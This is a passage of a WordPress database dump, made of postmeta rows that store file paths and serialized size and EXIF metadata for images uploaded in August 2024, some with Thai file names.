";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2645,958,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5.jpg'),
(2646,958,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5.jpg\";s:8:\"filesize\";i:400111;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17088;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169340;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8070;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100618;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22129;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2647,959,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2.jpg'),
(2648,959,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2.jpg\";s:8:\"filesize\";i:352729;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15353;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125074;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6623;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125074;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2649,960,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4.jpg'),
(2650,960,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4.jpg\";s:8:\"filesize\";i:376889;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19857;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168079;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9427;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102932;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25162;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2651,961,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1.jpg'),
(2652,962,'_wp_attached_file','2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3.jpg'),
(2653,961,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1.jpg\";s:8:\"filesize\";i:227848;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14147;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101709;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6951;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63842;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17830;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2654,962,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:104:\"2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3.jpg\";s:8:\"filesize\";i:338399;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15764;}s:5:\"large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121710;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6893;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:105:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121710;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:104:\"LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18250;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2655,963,'_wp_attached_file','2024/08/S__69214221_0-1.jpg'),
(2656,963,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214221_0-1.jpg\";s:8:\"filesize\";i:624127;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17630;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214221_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163288;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8602;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97631;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214221_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318680;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2657,964,'_wp_attached_file','2024/08/S__69214221_0-2.jpg'),
(2658,964,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214221_0-2.jpg\";s:8:\"filesize\";i:624127;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17630;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214221_0-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163288;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8602;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97631;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214221_0-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318680;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214221_0-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2659,965,'_wp_attached_file','2024/08/S__69214223_0-1.jpg'),
(2660,965,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214223_0-1.jpg\";s:8:\"filesize\";i:587816;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214223_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17117;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214223_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153662;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214223_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8558;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214223_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92234;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214223_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:299632;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214223_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22195;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2661,966,'_wp_attached_file','2024/08/S__69214213_0-1.jpg'),
(2662,966,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214213_0-1.jpg\";s:8:\"filesize\";i:518630;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214213_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16611;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214213_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138399;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214213_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214213_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84288;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214213_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:265183;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214213_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21436;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2663,967,'_wp_attached_file','2024/08/S__69214215_0-1.jpg'),
(2664,967,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214215_0-1.jpg\";s:8:\"filesize\";i:525335;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214215_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16587;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214215_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214215_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8037;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214215_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85740;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214215_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270993;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214215_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2665,968,'_wp_attached_file','2024/08/S__69214216_0-1.jpg'),
(2666,968,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214216_0-1.jpg\";s:8:\"filesize\";i:524808;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214216_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16598;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214216_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140653;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214216_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8072;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214216_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85783;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214216_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:270781;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214216_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21543;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2667,969,'_wp_attached_file','2024/08/S__69214217_0-1.jpg'),
(2668,969,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214217_0-1.jpg\";s:8:\"filesize\";i:524658;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214217_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16727;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214217_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141681;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214217_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8085;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214217_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86188;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214217_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271196;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214217_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21676;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2669,970,'_wp_attached_file','2024/08/S__69214219_0-1.jpg'),
(2670,971,'_wp_attached_file','2024/08/S__69214218_0-1.jpg'),
(2671,970,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214219_0-1.jpg\";s:8:\"filesize\";i:528944;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214219_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16809;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214219_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142127;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214219_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8145;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214219_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214219_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273075;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s